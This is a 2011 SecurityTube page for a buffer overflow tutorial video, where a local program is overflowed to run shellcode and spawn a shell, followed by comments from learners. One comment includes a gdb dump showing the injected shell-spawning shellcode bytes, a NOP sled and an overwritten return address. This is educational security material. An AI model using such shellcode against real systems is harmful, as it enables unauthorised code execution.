Buffer Overflow Primer Part 7 (Exploiting A Program Demo)
Posted By: SecurityTube_Bot
Posted On: Mon 21 Feb 2011
Views: 10668
Share this video:
Share it on Facebook Share it on Twitter Share it on Reddit Share it on Digg Share it on Stumbleupon
Support SecurityTube:


Description: Welcome to Part 7 of the Buffer Overflow Primer. If you have not already done so, please start this series by viewing Part 1. The Buffer Overflow Primer requires that you know at least some basic Assembly Language. I have created a series of Assembly Language video tutorials for Hackers here, for those not familiar with the language.

In this video we will do a buffer overflow exploitation demo using HackYou.c and ExploitMe.c . We will first execute HackYou.c to inject the shellcode into the environment variable EGG. Then, we will invoke ExploitMe.c with the $EGG input. This will cause the stack to be over written by the $EGG environment variable and plant our shellcode on the stack, and replace the RET address to point to our shellcode. Now, when main() returns, our shellcode is called. As expected the shellcode runs and spawns a shell :) It is important to note that in this video there are no protection mechanisms for the stack such as NX, ASLR etc. We will deal with how to exploit the stack in presence of these protections in later videos.





Tags: tools ,

This video is part of the following groups:

1. Buffer Overflow Exploitation Megaprimer for Linux ( 9 videos)

Comments (13)

xplt on Wed 02 Mar 2011

You're the best! =D

xplt on Wed 02 Mar 2011

I forgot to ask you something. Why does this don't work on ubuntu 9.10? That's because the ubuntu manage the stack diferently than slackware? Because i tried to execute the programs desabling the SSP, but it still didn't work.

Vivek-Ramachandran on Wed 02 Mar 2011

I'd have to probably check what mitigations that specific version of Ubuntu ships by default but it could be anything - DEP, ASLR, Stack Cookies etc. In some circumstances, some or all of these protections can be bypassed.

Have a look at the Exploit Research Megaprimer in progress. I will be covering these topics in more depth there.

Col_Loki on Sat 30 Apr 2011

Brilliant. Looking forward to finishing this series tomorrow.
Many thanks.

escube on Sat 04 Jun 2011

Hi Vivek, and Hi to everybody.
First of all I really want to tank you for your video, I'm studing it and they are really of good quality.

I've tried out your example.
First time it didn't work because I had a protection in my BackTrac Compiler. Thanks to s0ttle at the link : http://www.smashthestack.org/viewtopic.php?id=388
I discovered I had a Stack Smashting Protection (SSP) / ProPolice, so I disablet it.

Still doesn't work.
It seems the layout of my stack is different then the stack in your stack.

I've watched other your video in exploitation and I saw you usually put the payload (shellcode) after the return address and not before.
It seems to me that putting the payload before the return address is going to make things a bit more difficult then putting it after.

Could you tell me why you choosed to put the payload before the ret address, so I can understand what is the purpose of this?

Thanks again
Escube

3ntropy on Sat 18 Jun 2011

thank you for the tutorial, it was really excellent.

smartboy on Tue 12 Jul 2011

Thanks you very much.

Josh on Sun 21 Aug 2011

So to find the return address, you just sued the top of the stack? You surely can not always do this, so how would you work out the return address otherwise?

By the way, amazing video series and the assembly series primer, I had a lot of trouble getting the stack for a long time and now thanks to you I do, many many thanks and please do continue.

kilgore on Sat 17 Sep 2011

Once again, thank you for the time and effort you've taken to share your knowledge.

The ambient background noises on the different series are interesting :) I've heard water dripping, gunshots, birds calling and I believe some frogs. I picture you in a hut in the middle of a jungle somewhere :)

t0ph4tter on Tue 18 Oct 2011

I am having some problems getting this to work. As you can see below, I have gotten ret to point back to esp:

# after injection
(gdb) x/24xw $esp
0xbffff410: 0xbffff418 0xbffff68f 0x6850c031 0x68732f6e
0xbffff420: 0x622f2f68 0x99e38969 0xe1895352 0x80cd0bb0
0xbffff430: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff440: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff450: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff460: 0x90909090 0x90909090 0x90909090 0xbffff410 # points back to shell code
# Is there a problem with ebp being overwritten?
# Is there a protection mechanism going on or am I just doing it wrong?
(gdb) x/1xw $ebp
0xbffff468: 0x90909090
(gdb) s
11 }
(gdb) s
Cannot access memory at address 0x90909094

t0ph4tter on Tue 18 Oct 2011

Thanks for the video by the way. Even though I haven't gotten it working, I feel like I understand the concepts a lot better.

Patcher on Wed 21 Dec 2011

@t0ph4tter same error, did u find a fix??

dikien on Sun 25 Dec 2011

thank you, I failed because security cookies...Now I'm figuring out what it is!!
but in your computer situation, I can handle it!

Login to post a comment